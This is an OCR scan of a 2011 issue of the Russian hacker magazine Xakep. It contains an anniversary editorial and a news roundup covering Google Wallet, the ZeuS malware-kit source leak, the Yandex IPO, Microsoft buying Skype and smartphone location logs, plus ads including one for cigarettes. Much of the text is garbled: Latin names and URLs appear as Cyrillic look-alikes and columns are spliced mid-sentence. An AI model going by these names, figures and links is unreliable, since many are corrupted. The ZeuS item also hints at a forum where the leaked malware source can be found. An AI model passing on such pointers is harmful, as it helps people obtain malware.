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150 месяцев назад, холодный послекризисный февраль 1999 года. 
Митинский радиорынок, глючный @та(-ир, трехдюймовые дискеты, 
ПАГ пе, Репиит ММХ и пиратская копия \\пдо\м/5 98 на царапаном 
диске. Вечно занятые ВВФ уже не в моде, зато ночной интернет- 
анлим — мечта любого юного гика и предмет для разногласий с 
родителями. Генофонд пока в норме: с 80 по 85 год страна произ- 
водила 2-3 миллиона детей в год, и к концу девяностых в России 
оказалось больше 10 миллионов тинэйджеров, ищущих свое при- 
звание, предмет для мощного увлечения на всю жизнь. Кто-то 
выбрал балтику-девятку перед школой по 10 рублей за бутылку, 
кто-то шприц с мутной жижей на лестничной площадке. Но было 
немало и тех, кто страстно жаждал узнать 1р ламера в чате и про- 
патчить маздай, чтобы через шары не уперли дайлап. Учитывая, что 
ларьки с прессой были заполнены рецептами лечения геморроя по 
авторской методике «моча, гусиный помет и зверобой», 1999 год 

— несомненно, лучшее в истории человечества время для запуска 
журнала компьютерных хулиганов. 


м: ЧУЖОЙ нов 
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Сейчас, спустя 12.5 лет, очень круто и приятно анализировать путь, 
пройденный журналом. Приятно осознавать, что Хакер всегда 
менялся для читателей: иногда предугадывая и формируя интерес, а 
иногда — следуя уже самостоятельно оформившимся потребностям. 
Приятно понимать, что журнал выполнил важнейшую роль: воодуше- 
вил в сложное время десятки тысяч молодых парней на саморазви- 
тие и самообучение, показал им светлую и веселую сторону техноло- 
гий, заставил заниматься ИТ и развивать технологии в нашей стране. 


Аплодисменты людям, которые создали Хакер и на разных этапах 
сопровождали журнал эти 12.5 лет: Игорю Пискунову, Синтезу, Феде 
Добрянскому, Холоду, Данечке, Ядовитому, Курту, Мишгану, Мэлу, 
Реланиуму, Кибизоиду, Сайдексу, Мише Терехову, Максу Зеленко, 
М..].АзБ’у, Куттеру, Бублику, Хинту, Симбиозису, Олегу №50, Руслану 
Рубанскому, Кириллу Петрову, Косте Обухову, Саше Лозовскому, 
Андрею Матвееву, Форбу, Длинному, Горлуму и Степу. Респект! 
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 МЕСАМЕМ/5_ 


Мария «МИг[» Нефедова (тИгЦИагеа(.хаКер.ги] 


Мецапем$ 


КОШЕЛЕК И МУЗЫКА ОТ 6006 Е 


боод(е уже давно перестал бытьтолько лишь 
поисковым гигантом, и запуск двух новых 
сервисов — лишнеетому подтверждение. 
Компания, наконец, анонсировала долгождан- 
ный сервис мобильных платежей. Он получил 
имя Соод(е \\аЦеи был разработан в сотруд- 
ничестве с С\югоир, МаегСага, Е аа и 
американским оператором 5ргип(. О подобных 


сервисах, позволяющих превратить мобильный 
телефон в кошелек, мы рассказывали раньше 
(например, о ВИпоТад]. Обычно они предпо- 
лагают использовать модуль МЕС ([МеагЕ!е{4 
Согпгпип!сайоп). Если такового в устройстве 
нет, то боо(е предлагает использовать специ- 
альные МЕС-стикеры. Пока боод(е \\МаЦ&{ пла- 
нируется запустить только на смартфонах под 
управлением Апого!а, однако в боод(е уверяют, 
что компания будет «сотрудничать со всеми», 
если поступят соответствующие предложения. 
Когда состоится запуск боод(е \\аЦеЕТ, пока не 
сообщается, зато вокруг сервиса уже успел 
разгореться скандал. В судна боод[е собирают- 
ся подавать компании еВауи РауРа(, обвиняя 
«Гугл» в краже коммерческой информации. 
Дело втом, что некоторое время назад бооц(е и 
еВау вели переговоры о запуске новой онлай- 
новой платежной системы. Со стороны еВау 
«переговорщиком» выступал Усама Бедье, ко- 
торый перед самым подписанием соглашения 
внезапно решил уволиться и перейти работать 


Обо всем _ 
за последний 
месяц 


в... СооЧе. В начале 2011 года Бедье получил 
должность, ни много ни мало, вице-президента 
Сооце, ана должность вице-президента по 
электронной коммерции пришел еще один 
«перебежчик» — Стефани Тилениус, ключевая 
сотрудница РауРа(. В еВауутверждают, что эти 
двое обладали стратегически важной инфор- 
мацией по всем аспектам работы платежной 
системы. Что характерно, презентацию сервиса 
боод(е \МаЦе{ в Нью-Йорке проводили именно 
Бедье и Тилениус. Похоже, искотеВауи РауРа! 
действительно не заставит себя ждать. 

Второй анонс был менее громким — боод{[е вре- 
жиме бета-теста запустил музыкальный сервис 
[покатолько для жителей США]. Теперь каждый 
пользователь может загрузитьтуда «в Гугл» 20 
000 треков, после чего они станут доступны ему 
с других компьютеров и с мобильных устройств. 
Для сервиса выпущено специальное Апаго- 
приложение. Кстати, скачивать загруженную 
музыку нельзя, только слушать в потоковом 
режиме — борьба с пиратством. 


В марте, в ходе операции по аннигиляции ботнета Кизфоск, были изъяты 
десятки жестких дисков. Мисгозо К сообщает, что на них нашлось много 


интересного: к примеру, водном файле содержалось 427 000 етаЦ-адресов. 


ФАРМЕРЫ ПОНЕВОЛЕ 


Любителям ММОРПГ известно, что во всех мало-мальски популярных 
онлайновых играх пышным цветом процветает бизнес наших восточ- 
ных братьев. Корейцы и китайцы [в основном китайцы] прокачиваютза 


реальные деньги персонажей, продают игровые вещи, добывают для по- 
следующей продажи различные внутриигровые раритеты, или же честно 
и тупо фармят голд. Самое забавное втом, что занимаются такими делами 
не только боты, но и живые люди, все же за ботоводство в солидных играх 
можно очень быстро получить бан. Но кто бы могподумать, что иногда 
люди делают это вовсе не по собственной воле. Британское издание «ТВе 
СчагЧ!ап» опубликовало интересную информацию: корреспондент брал 
интервью убывшего заключенного, отбывавшего наказание втрудовом 
лагере Цзиси (китайская провинция Хэйлунцзян). Согласно показаниям 
бедняги, днем узники в их поселении работали наугольной шахте по 12 
часов, а ночью занимались фармингом! Предприимчивое руководство 
лагеря решило подзаработать и заставляло 300 человек посменно играть 
в \/\/ог[9 от \/агсга". Компьютеры работали круглосуточно, в день «зеки» 
могли приносить до 5000-6000 юаней, то есть порядка $900. Разумеется, 
сами ударники виртуального труда этих денегне видели, все уходило в 
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карман администрации. За невыполнение установленной дневной нормы 
фарма заключенных подвергали физическим наказаниям. Втаких чудо- 
вищных условиях даже самый ярый фанатонлайновых игр, скорее всего, 
возненавидел бы их на всю оставшуюся жизнь, что говорить о бедных за- 
ключенных. Как метко подмечает шокированная сетевая общественность: 
вотона, колония ХХ!| века — зал видеоигр. 
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Сервер + лицензионный софт! 


КОНОМЬ! 


| Юз Сбыбам Шшшшй 2 вы 


Мощный четырёхьядерный процессор име ® хеоп® 3400 для многозадачной работы, Оперативная память 
с коррекцией ошибок и дисковое пространство, организованное в РАО-массив, для бесперебой работы сербера. 
Аицензионная серверная операционная система, для комфортной работы и защиты от многих рисков! 
Технические характеристики сервера: 

" Процессор пФ Хесп® 3-$00 

"= Операционная система АЛп0омз Зегуег 20080 Роипда оп 

" ОЗУ до 32ГБ СОАЗ ЕСС Не 


" Дисковая подсистема до б диском ЗАТА ({опциомально =горячей. замены] 


Специальные условия для днлеров и системных интеграторов! 
ыы е За бесплатной консультацией и по вопробам приобретеныя обращайтесь 
С. — к нашим партнерам, Полный список партнеров на мидии. ау е-согироегв, го 


+ Техническая подлержка: ЗАО «Эр-Стелл Компьютерс» 
С О М Р Ц | Е К =] Тел. : (495) 514-14-17 Бесплатный телефон д России: 8-800-200-В00-.7 


Мощный. 
Интеллектуальный. 


Корпорация [п{е| не несет ответственность и не осуществляет проверку добросовестности или достоверности каких-либо утверждений или заявлений относительно 
конкретных компьютерных систем, упоминание о которых содержится в данной рекламе. 

Корпорация |п1е|! ©2010 г, Все права защищены. [{е|, логотип |п1е|, пе! Соге и Соге являются товарными знаками на территории США и других стран. Реклама. 

*Другие наименования и товарные знаки являются собственностью своих зако нных владельцев 


СВЕЖИЕ «МАКИ» +70% К ПРОИЗВОДИТЕЛЬНОСТИ 


Компания Арр(е продолжает планомерное обновление своей про- 
дукции. На этот разтрадиционной «доработке» подверглись ком- 
пьютеры !Мас, в последнее время несправедливо забытые на фоне 
|Рад, (РВопе и иже сними. Теперь доступно четыре конфигурации 
моноблоков: 

21,5", четырехядерный процессор [ее Соге 15 с частотой 2,5 ГГц, ви- 
деоадаптер АМО 6750М спамятью СООКЪ объемом 512 Мб, жесткий 
диск объемом 500 Гб, ценав США — $1199 

21.5", 15 2,7 ГГц, АМО 6770М 512 Мб, жесткий диск 1 Тб, $1499; 

27" 152,7 ГГц, АМО 6770М 512 Мб, жесткий диск 1 Тб, $1699; 

27", 153,1 ГГц, АМО 6970М 1 Гб, жесткий диск 1 Тб, $1999. 

Как видишь, новые «Маки» обладают мощными четырехядерными 
процессорами \е[ Соге 15, а при покупке также имеется возмож- 
ность выбрать процессор Соге 1/ с частотой до 3,4 ГГц, установить 
дополнительный жесткий диск до 2 Тб, 550 -накопитель объемом 256 
Гб, иувеличить ОЗУ до 8 Гб. Также новое поколение Мас, это первые 
настольные компьютеры на рынке, оснащенные интерфейсом ввода/ 
вывода ТПипдегБо( (один порт для 21,5-дюймовой модели и два для 
27-дюймовой). 

К нововведениям можно отнести и камеру ГасеГите НО с поддержкой 
видео высокого качества. В остальном серьезных изменений нет: |Мас 
по-прежнему выполнены в корпусе из алюминия и стекла, базируются 


на |Р5-матрицах, имеют порт иге\ ге 800, 4 порта ЗВ 2.0, считыва- 
тель карт50ХС, оптический привод бирегОпуе ([0\У0-К\/), порт б1даби 
Е{Бегпе! и адаптеры \\/1-Е!(802.11п 2,4/5 ГГци Вшеюо!! 2.1+Е0К). Обнов- 
ленная линейка макинтошей уже в продаже. 


Компания зеада{е представила первый в мире жесткий дисктипоразмера 
3,5 ДЮЙма, на каждой пластине которого хранится 1 Тб информации. Этот 


показатель соответствует рекордной удельной плотности записи 625 Гбит/ 


КВ.ДЮЙМ. 


30 ЛЕТ ЗА ПОДДЕЛЬНЫЕ КУПОНЫ 


28400 00001 


Это, пожалуй, было бы смешно, если бы не было так печально. В Сое- 
диненных Штатах судят 22-летнего студента Рочестерского техноло- 


» 


гического института по имени Лукас Хендерсон, и парню грозит до 30 
леттюрьмы. Нет, этот будущий П-шникне воровал тысяч банковских 
карт, неломал популярные онлайновые сервисы и не совал свой нос 
в правительственные сети. Лукас прикола ради распространял через 
имейджборды (вроде 4сВап и ГоКк(е{] поддельные скидочные купоны, 
которые сам же и «рисовал». Особо отметим, что он не заработал 

на этом ни цента. Однако правоохранительные органы сообщают, 

что общий убыток от действий Хандерсона составляет сотни тысяч 
долларов. Горе-любитель халявы не мелочился, он распространял 
купоны самых разных мастей, от скидок на стиральные порошки до 
Зопу Рау а! оп. Интересно и то, что парень неплохо заметал следы, 
юзал прокси, Тог, но в итоге засветился, глупо потеряв бдитель- 
ность, — опубликовал пару постов безо всяких ухищрений со своего 
университетского |Р. Теперь, как уже сказано выше, ему грозит весьма 
длительный тюремный срок. 


Огорбох раскрыл статистику, согласно которой пользователи сохраняют 
300 млн файлов ежедневно. Это более миллиона файлов каждые э минут! 


В целом юзеры Огорбох сохранили уже более 100 млрд файлов. 
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Круче, чем 
вареные яйца! 


Персональный компьютер Мгсго Хрем$ на базе Рейтинг процессора 
процессора |п{е!® Соге"М 15 2-ого поколения 


ЮЛМЯРТ Пр-тАндропова д. 22/30, стр. 1 
‚ `ШР (495) 287-42-41 | мммммишитагеги 


КИБЕРМАРКЕТ ЭЛЕКТРОНИКИ 


Корпорация пе! не несет ответственность и не осуществляет проверку добросовестности или достоверности каких-либо утверждений или заявлений относительно 
конкретных компьютерных систем, упоминание о которых содержится в данной рекламе. 


Корпорация |п{е! © 2011г. Все права защищены. [п*е1, логотип [п{е|, пе! Соге и Соге являются товарными знаками на территории США и других стран. Реклама. 
*Другие наименования и товарные знаки являются собственностью своих зако нных владельцев. 


КОМПАКТНОЕ АУДИТ 


ЕСЕЕК 


Компании Ед ег выпустила интересный гаджет — компактную, портативную аудиосистему МР1Ъ 


со встроенным МР3-плеером, которую можно подключить клюбому источнику звука. Большим 


плюсом является то, что система может работать отвстроенного аккумулятора (за рядка осу 


ществляется по /5В-кабелю}, а одного полного заряда хватит на 6 часов воспроизведения. Это 


позволяет использовать гаджет как дома, так и вдали от цивилизации — автономно. Новинку 
действительно удобно брать с собой: размеры очень скромны — 200х60х33З мм, а вес равен всего 
200 граммам. Аудиосистема МР15 поддерживает $0 -карты и совместима со всеми аудиоформа- 


тами. Качественный звук обеспечивается современными магнитно-экранированными динами- 


ками 2х1,5" [40мм] с алюминиевой мембраной. Управление звуком и встроенным МР3-плеером 


осуществляется при помощи удобных прорезиненных кнопок, расположенных на верхнем ребре 


корпуса. 


» Корпорация эутащес совместно с Профессионалы. ру провели опрос, 
в ходе которого выяснили, что 70% сотрудников компаний выносят 


корпоративную информацию из закрытых внутренних сетей, 68% — пользуются 
на работе социальными сетями, а более 56% опрошенных вообще унесли бы 
с собой на флешке не просто корпоративную, но и строго конфиденциальную 


информацию. 


ЭТОЙ МЫШИ НЕ НУЖНЫ ПРИЕМНИКИ И ПЕРЕДАТЧИКИ 


Современная публика уже давно привыкла 
к различным беспроводным гаджетам, но 
компания НР решила удивить искушенных 
компьютерщиков и выпустила в продажу 
«грызуна», сообщающегося с компьютером 
посредством \/\/!-Е!. Новинка получила неза- 
мысловатое название \\/1- Е! Мобце Моцзе и, 
как гласит официальное заявление НР, это 
первая в индустрии компьютерная мышь, 
использующая интерфейс \/-Е! (технология 
[МеКк-5).У новинки есть один неоспоримый 
плюс — для работы ей не нужны никакие 
приемники сигнала, которые, как правило, 
являются обязательным элементом для бес- 
проводных девайсов. \\/1- Е! Мобце Моизе под- 


ключается к компьютеру напрямую, то есть из 
0$В-портов ничего лишнего торчать не будет. 
Радиус действия девайса — 10 м, а срок рабо- 
ты на одном комплекте батарей типоразмера 
ДА — 9 месяцев. Очень неплохо, согласись? 
Но этоеще не все. Хотя устройство и позицио- 
нируется НР, как компактное и мобильное, 
разработчики подумали и оего функциональ- 
ности: НР \\- ЕЕ МобЦе Мочцзе оснащена пятью 
программируемыми кнопками и четырехпози- 
ционным колесом. К тому же, мышка исполь- 
зуетлазерную систему позиционирования, 
где частота опроса датчика составляет 1600 
отсчетов на дюйм [СР]. Цена гаджета в Европе 
составляет $50. 


ЯВА ЗОЛОТАЯ ТУРБО 


Хорошо известная на российском рынке марка «Ява Золотая» представляет новику — сигареты «Ява Золотая 
Турбо», отвечающие всем новейшим тенденциям в данной области. Особенности конструкции фильтра позволя- 
ют потокам воздуха и дыма смешиваться в полой воздушной камере, обеспечивая этим мягкость и сбалансиро- 
ванность вкуса. Такой вид фильтра уже широко используется в сигаретах премиум-класса в разных странах мира 
— теперь этатехнология применяется и в «Яве Золотой Турбо». Новинка предлагается в одной версии насыщен- 
ности вкуса. Содержание в дыме сигареты: смолы — 7 мг, никотина — 0,6 мг, СО — 8 мг. Максимальная розничная 
цена на «Ява Золотая Турбо» составит 25 рублей. 


ЗОРЕН АМОЕГЕЙ Р|и$ 
гарантирует совершенную яркость цветов 


ЗЫРЕВ 
АМОТЕО”- 


Быстрый \! 


Двухъядерный процессор 1,2 Ггц 
задает новый уровень 
производительности 


определяет уникальный дизайн 


я 
ТО | КИ Толщина 8,49 мм 


Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). 


мллл.затзипо.сот. Товар сертифицирован. Реклама. 
ЗИРЕВ АМОГЕВ Р!из — сверхъяркий экран высокого разрешения. ба!аху — Галактика. 


ГЕЙМЕРЫ НА СЛУЖБЕ АРМИИ 


7159300 


Американские военные очень стараются идти в ногу с прогрессом, мыс- 
лить нестандартно и обратить глобализацию в свою пользу. Порой из со- 
вокупности этих факторов рождаются очень смешные вещи. Признаться, 
узнав о новой затее ВМФ США, мы поначалу решили, что эта запоздав- 


шая первоапрельская шутка, но нет, оказалось, что все серьезно. Амери- 
канцы придумали привлечь к решению проблемы сомалийских пиратов... 
геймеров. Нет, мы не шутим. Они тоже. Армейские специалисты всерьез 
полагают, что геймеры, закаленные годами игры в стратегии и ММОРПГ, 
сумеют помочь в разработке новой методики борьбы с сомалийцами. 

Для этих целей был создан проект Маме Мир{ауег ОпИпе \/агСбате 

[ еуегад!па {Ве |п{егпе{ [ММОМ/СЦ), найти которой можно по адресу 
гагпом/а.прэ.еди. Это будет не что иное, как онлайновая игра, в которой, 
как несложно догадаться, будут моделироваться условия, максималь- 

но приближенные к реалиям. Запуск ММО\М/СЦ | состоится этим летом. 
Вообще-то, игра должна былауже стартовать, однако слишком много 
людей выразили желание поучаствовать в проекте, так что релиз пока от- 
ложили. Гем не менее, уже известно, что игра будет разбита натри раунда, 
каждый из которых будет длиться неделю. Игрокам придется не просто 
ходить под парусом и постреливать по врагу из всех орудий, но вырабаты- 
вать стратегию, оценивать риски, составлять самые настоящие военные 
планы. Также геймеры получат возможность голосовать за идеи других 


участников игры, выбирая оптимальные варианты развития событий. 


России составил около 3 млрд долларов. 


А КИБОРГОВ ВСЕ БОЛЬШЕ И БОЛЬШЕ 


Слово «киборг», придуманное Манфредом 


Клайнсом и Натаном Клином еще в 60-х годах 
прошлого века, уже давно перебралось со 
страниц фантастических романов в нашу 
жизнь. Как очень тонко отмечает один из 


основателей жанра киберпанк Уильям Гибсон: 
«Киберпанк уже здесь, просто пока он распре- 
делен очень неравномерно». Действительно, 
пока мы не сталкивается с проапгрейджен- 
ными людьми на каждом шагу, но, возможно, 
подобные времена уже недалеко. Случаи, 
когда людям после травм устанавливали био- 
нические протезы, уже известны [хотя пока 

их единицы], но теперь появился и первый 
киборг по доброй воле. Двадцатишести- 
летний серб по имени Майло согласился на 
добровольную ампутацию кисти руки, чтобы 
поставить на ее место бионический про- 

тез! Стоит отметить, что несколько лет назад 


НОУТБУК НА СОЛНЕЧНЫХ БАТАРЕЯХ 


На ежегодном африканском форуме в Найроби 
компания 5агтзипд представила весьма любо- 
пытную разработку. Пусть пока это лишь анонс и 
прототип, потенциалу девайса может ока- 
заться большой. Затзипд объявил о создании 
ноутбука, работающего на солнечных батареях. 
Прототип показали публике, можно сказать, 
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издалека — все, что пока о нем известно, это на- 
звание: М№МС2155. Технические характеристики 

и какие бы то ни было подробности не разгла- 
шались. Разработка, по словам представителей 
компании, ориентирована на африканцев и 
других жителей развивающихся стран, гдес 
электричеством большие проблемы [чаще всего 


По завершении виртуальных баталий, ВМФ США систематизирует по- 
лученные данные и получитна руки множество новых, вероятно, весьма 
нестандартных идей по борьбе с сомалийцами. Такой вот оригинальный 
краудсорсинготамериканских военных. 


Ассоциация производителей программного обеспечения обнародовала 
ежегодный отчет, согласно которому в 2010 году ущерб от пиратства в 


Майло все же попал в автокатастрофу, и его 
рука по сей день практически парализована. 
Тем не менее, шаг все равно смелый. Новый 
бионический протез, который врачи при- 
шьют пациенту вместо его собственной руки, 
выглядит почти как настоящая кисть, умеет 
захватывать и удерживать мелкие (и довольно 
хрупкие] вещи. Работает устройство, под- 
чиняясь командам мозга владельца, которые 
воспринимает благодаря датчиками, что кре- 
пятся к нервам предплечья. На иллюстрации, 
кстати, не Майло, а самый первый на Земле 
человек с бионическим протезом — 24-летний 
австриец Патрик. 


выражающиеся в полном его отсутствии). Если 
все это не громкие слова и не сырой концепт, до 
воплощения которого еще далеко, то подобное 
устройство могло бы заинтересовать отнюдь не 
только африканцев, но ивыживальщиков, пу- 
тешественников и прочих сограждан, любящих 
забраться подальше отцивилизации. 


ХАКЕР 07 /150/ 2011 


ПРИ ПОКУПКЕ 
КАЧЕСТВА — 
_ молоко — 

РОК к 


7 р к 


г ем %% + ар 
те к ь 
АА 


т 


> Слово «кашруль | намврите означает «пригодный, разрешенный. аа 
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ЗАКАЗУХА ВЫСШЕГО УРОВНЯ 


Как известно, на войне все средства хороши, 
а когда речь идет о конкуренции огромных 


компании, это и есть самая настоящая война 
— информационная. На очень неприятной 
вещи поймали компанию Гасероок, поймали 
буквально за руку: ГасеБооК попытался за- 
казать очернение боодц(е в прессе. С этой де- 
ликатной просьбой Цукерберги сотоварищи 
обратились к РК-агентству Вигзоп-МаеЦег, 
входящему в структуру крупнейшего миро- 
вого рекламного холдинга \/РР, чьими 
клиентами также являются такие «монстры», 
как М!сго5оН. Задача, поставленная перед 
пиарщиками, была проста: требовалось 
опубликовать в американских СМИ поболь- 
ше критических статей о политике бооц(е, 

а именно — отом, как поисковый гигант 
размещает в своем индексе данные [в обход 
запретов на индексацию социальных сетей). 
Нечестная игра Гасебоок раскрылась, когда 
представители Вигзоп-Ма${еЦег попытались 


заказать популярному западному блогеру 
негативный очерко Соод(е. Блогер нетолько 
отказался писать подобное, но и, выяснив 
побольше подробностей, опубликовал 
переписку с пиарщиками на согпрщегмо га. 
сот. В прессе, разумеется, тут же поднялась 
изрядная шумиха, датакая, что припертый 

к стене Гасероок даже факта «заказа» от- 
рицать не стал (попросту не смог). Зато пред- 
ставители Виг5оп-Ма${еЦег теперь заявляют, 
что этот проект противоречил этическим 
нормам их агентства, и они влюбом случае не 
собирались его выполнять. Также в Вигзоп- 
Маз{еЦегуже оборвали с крупнейшей соци- 
альной сетью все отношения. Представители 
Соод(е от комментариев воздерживаются, 
что, вобщем, логично — Еасероок и без по- 
сторонней «помощи» уже заработал большое 
пятно на своей репутации. 


Сергей Брин, один из основателей бооц(е, рассказал, что всего около 
20% сотрудников компании пользуются 0С МисгозоН \\Ипдо\м$. Сам Брин 
признался, что предпочитает САготе 05. 


[ЕЦ — БЕСПЛАТНО, ВСЕМИ КАЖДОМУ 


ЕН 5 = 


ри 


После слияния воедино двух лидирующих на 
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| 


черном рынке инструментариев, /еи$ и 5руЕуе, 


было ясно, что грядут определенные пере- 
мены. Мы держим руку на пульсе и стараемся 
информироватьтебя о последних переменах на 
этом фронте. Последние новости таковы: Геи 
в своем прежнем виде, судя по всему, перестает 
существовать. Исходники малварь-кита были 
обнаружены специалистами по безопасности 
сразу в нескольких местах Сети, совершенно 
бесплатно, доступные для скачивания. Таким 
образом, продажам инструментария (чья цена 
доходила до $10 000, в зависимости от сборки] 
пришел конец. Нельзя сказать, что это очень 


здорово, так кактеперь исходники совершенно 
бесплатно попадут в руки кучи «энтузиастов», 
которые смогут создать с их помощью много 
всякого-разного. Кто устроил эту утечку и зачем, 
пока остается неясным. Вполне возможно, 

что авторы «Зевса» в будущем добавят в свое 
творение новые функции и продолжатторговать 
более «продвинутыми» его версиями. То есть, 
вероятно, ${апд-а1опе-версию хоронить все же 
еще рано. Кстати, небольшая подсказка: в поис- 
ках тех самых исходников советуем заглянуть на 
форум ммазт.ги :]. 


КОПИРАСТЫ СТАВЯТ НОВЫЕ (АНТИ)РЕКОРДЫ 


В последнее время среди правообладателей 
считается едвали не моветоном не судиться с 
пользователями. «Зарабатывать» сотни тысяч 
долларов на домохозяйках и студентах — это 
модно, легко и удобно. Однако большинству 
борцов за авторское право очень далеко до 
масштабов судебного разбирательства, которое 
учинила компания И$ Сорупа{ Сгочр, пред- 
ставляющая интересы кинопродюсеров. 15 
СорупаР{ Сгоир собирается засудить, ни много 
ни мало, 23 000 человек за скачивание боевика 
Сильвестра Сталоне «Неудержимые». Это ре- 
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корд даже для американцев. Изначально в иске 
фигурировали 6500 обвиняемых, но в данный 
момент, поутверждению истца, известны уже 23 
322 1Р-адреса, и их количество, вероятно, еще 
увеличится. Судья уже разрешил компании за- 
проситьу интернет-провайдеров информацию о 
пользователях, скачавших фильм. Информация 
включает в себя имя, адрес, номертелефона 

и адрес электронной почты. Интересно, что на 
этот раз обвиняемым инкриминируется не рас- 
пространение фильма в файлообменных сетях, 
алишьего скачивание. Размер штрафа за это 


‚ 1НЕЕХРЕМОАВЫЕЯ 


| 


может составить до $150 000. Впрочем, ожидает- 
ся, что большинство претензий урегулированы 

в рамках мировых соглашений, то есть после 
уплаты штрафа в размере $3000. 
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ШИФРОВАНИЕ БЕЗ ШИФРОВАНИЯ 


Шифрование данных — штука 
хорошая, но не всегдаудобная, 
ведь зачастую сам фактшифрова- 
ния действует на любознательных 
ломателей, как краснаятряпка на 
быка [раззашифровано, значит 
что-то интересное). Исследо- 
ватели из Университета Южной 
Калифорнии [США] и Нацио- 
нального научно-технического 
университета Пакистана (МИЗТ) 
под руководством Хасана Хана 


нашли интересную альтернативу 
современным методам защиты данных. Они предлагают использовать 
методы стеганографии и даже написали для этого специальное ПО. По 
сути, получается шифрование без шифрования: написанный исследова- 


ИНТЕРНЕТ-ТЕЛЕВИЗОР ОТ УЕЗТЕЕ 


Соппееа ТУ откомпании \е$е(, это телевизор с диагональю 55 
дюймов, в который интегрированы различные «плюшки» интернет- 
инфраструктуры. Система (при помощи пульта дистанционного управ- 
ления] обеспечитлегкий доступ к некоторым интернет-страницам, даст 


возможность выбирать различные виджеты, а именно новости, погоду, ту- 


ристическую информацию, часы, видео, изображения итак далее. Также 
телевизор позволитнасладиться развлекательным контентом в формате 
30 (будь то фильмы, спортивные трансляции, игры или фотографии), 
благодаря использованию активных З30-очков. ЗО-режим изображения 
выбирается автоматически, посредством нажатия кнопки ЗП на пульте 
дистанционного управления. То есть, ты свободно можешь переключать- 
ся между режимами 20 и ЗО. Благодаря разработке и интеграции втеле- 
визор специального чипа и алгоритму виртуальной глубины, создается 
иллюзия глубины изображения при просмотре фильмов или фото. Также 
новинка может похвастаться функцией коллективного использования, 
высоким разрешением ЗВ и совместимостью со многими 30 -форматами. 


являются владельцами МасВоок. 


телями софтне отдает расстановку кластеров файла на откуп контроллеру 
накопителя, а делает это самостоятельно. «Шифр» тоже довольно прост: 
если последовательно идущие кластеры расположены рядом, это озна- 
чает«1» в бинарном коде, если на расстоянии, — «0». Все что требуется 
знать, чтобы докопаться до секретной инфы — в каком файле перестав- 
лены кластеры. Дешифровка данных выполняется той же прогой, что их 
кодировала. По утверждению создателей, взломать систему практически 
невозможно, однако она имеет ряд чисто физических ограничений. Так, 
скажем, на жестком диске объемом 160 Гб можно сохранить шифровку 
размером 20 Мб. Дефрагментация для новшества тоже опасна, она может 
обернуться потерей всех данных. Также пока нельзя вносить изменения 
вуже закодированное послание — придется переделывать его заново. 
Ну и, конечно, проблемы могут возникнуть с ГАТЗ2, где максимальный 
размер файла составляет 4 Гб. Подробности можно найти по адресу 


сепсегес{. сот/с!епсе/агисе/р!/5016740481000088У, но, к сожале- 
нию, только на английском языке. 


На ежегодной конфереции МОС 2011 было объявлено, что в настоящее 
время в мире существует 54 млн пользователей Мас, причем 3/4 из них 


«ЯНДЕКС» СТАЛ ПУБЛИЧНОЙ КОМПАНИЕЙ 


В конце мая состоялось знаменательное для всего Рунета собы- 
тие — компания «Яндекс» разместила акции на фондовой бирже 
МАЗОАЦ. [РО [п#а[РуБИс 
ОНегтпа — первоначальное 
публичное предложение акций 
компании на продажу широко- 
му кругу лиц] «Яндекса» стало 
одним из самых ожидаемых в 
этом году. Компания котируется 
под тикером УМОХ. Это было уже 
второе крупное |РО российской 


интернет-компании за послед- 
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ний год. Напомним, что в ноябре 2010 года Мац.ги Сгоир разместила 
на Лондонской фондовой бирже около 16,8% акций. «Яндекс» начал 
торги акциями на бирже МАЗРВАЦС 24 мая в 18:30 по московскому 
времени, и изначально предполагалось получить после размеще- 
ния акций около 1 млрд долларов. Но все обернулось еще лучше: в 
ходе [РО «Яндекс» был оценен в 8,03 миллиарда долларов. Акции 
компании были размещены по верхней границе ценового диапазона 
— на уровне $25 за штуку. Впоследствии торги начинались уже с $35 
за акцию. То есть, вся компания оценена примерно в 11,2 миллиарда 
долларов. «Яндексу» удалось заткнуть за пояс даже социальную сеть 
[пкеп, вышедшую на МАЗПАЦ неделей раньше. Наши им искрен- 
ние поздравления! 
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 МЕСАМЕМ/5_ 


МИСВОЗОЕТ ПОКУПАЕТ КУРЕ 


Крупнейшей сделкой за всю историю ком- 


пании стала для М!сгозо покупка сервиса 
|Р-телефонии и видеосвязи 5Куре — «мел- 
комягким» пришлось раскошелиться на 
$8,5 млрд. Напомним, что 5Куре и ранее 


переходил «из рук в руки». Первый разв 
2005 году, когда 5Куре приобрела компания 
еВау за $2,6 миллиарда, и позже, в 2009 
году, когда пакет акций 5Куре был продан 
консорциуму инвесторов за $1,9 миллиарда 
[06 этой непростой истории мы рассказы- 
вали подробно}. На данный моменту 5Куре 
170 млн активных пользователей, однако, с 
получением прибыли все равно возникают 
проблемы. 

Сможетли М!сго5о разрешить их? Возмож- 
но. У Т-гиганта большие планы относитель- 
но нового приобретения, к примеру, пла- 
нируется интегрировать поддержку Куре 


в ХБох, Кпес{ и аппараты с \\!п9ом/5 РПопе 
на борту, а также связать с многочислен- 
ными онлайновыми сервисами М!тсго$0И. 
Хотелось бы отметить, что панические крики 
«МтсгозоН убьет 5Куре!» вряд ли обоснова- 
ны. Известно, что новый владелец не соби- 
рается прекращать поддержку ${ап9-а{опе- 
версии приложения и версий для ихих, Мас 
ОЗ и других платформ. 5Куре войдет в состав 
М'!сго5ойЙ на правах отдельного подразде- 
ления. Во главе подразделения останется 
нынешний глава 5Куре Тони Бейтс [Топу 
Ва*ез}. Словом, поводов для паники пока 
нет вовсе. 


ПРОДОЛЖЕНИЕ «ШПИОНСКОЙ» ИСТОРИИ 


В ВВЛТНЕР В прошлом номере 
в | мы рассказывали о 
неприятной особен- 


ности, обнаруженной 


недавно в устрой- 
ствах компании 
Арр(е ((РВопе и!Рад 
с3Зб-модемом] и 


10. 


устройствах на базе 
Апаго!а. Оказалось, 


что смартфоны следят 
за своими хозяевами, тщательно протоколируя 
координаты своих перемещений в простран- 
стве и сохраняя их в отдельный файл. Особенно 
удручало, что такого рода логи в аппаратах Арре 


неочищаются месяцами, ато и годами, и по ним 
можно восстановить полную картину пере- 
мещений владельца гаджета за последний, 
скажем, год. Эта история получила продолже- 
ние. Во-первых, представители Арр(е и боод(е 
официально заявили, что вовсе не собирались 
шпионить за пользователями. Согласно офи- 
циальной версии, компании просто составляют 
базы данных синформацией о сотовых вышках 
и хотспотах \\/-Е!. Верим-верим, какже. Во- 
вторых, в Арр(е признали, что у системы есть 
недостатки. В частности, она не отключается 
даже тогда, когда пользователь выключил 
поддержку локационных сервисов. Плюс, как 
уже было сказано выше, логи хранятся годами, 


